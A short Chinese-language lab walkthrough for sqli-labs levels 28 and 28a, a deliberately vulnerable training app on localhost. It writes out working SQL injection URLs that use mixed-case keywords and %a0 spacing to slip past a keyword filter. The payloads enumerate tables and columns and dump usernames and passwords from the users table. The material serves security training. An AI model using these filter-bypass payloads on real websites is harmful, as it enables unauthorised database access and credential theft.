sqli-labs (less-28 and less-28a)
less-28
进入28关,输入ID=1
查看源代码
这里发现基本与27关一样,依然采用大小写混合绕过
http://127.0.0.1/sql1/Less-28/?id=1' #回显错误
http://127.0.0.1/sql1/Less-28/?id=1');%00 #正常显示
判断闭合方式为’);%00,并且为字符型注入
确定回显位置
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,3;%00
查看当前库
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,database();%00
查看security库下的所有表
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(table_name)) from (information_schema.tables) where (table_schema='security'));%00
查看users表下的所有字段
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(column_name)) from (information_schema.columns) where (table_name='users'));%00
查看username,password字段的值
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(username,password)) from (security.users));%00
less-28a
http://127.0.0.1/sql1/Less-28a/?id=1' #回显错误
http://127.0.0.1/sql1/Less-28a/?id=1');%00 #回显正常
判断闭合方式为’);%00,并且为字符型注入
下面的不具体介绍,跟less-28完全一样,这关也是采用大小写混合即可绕过waf防火墙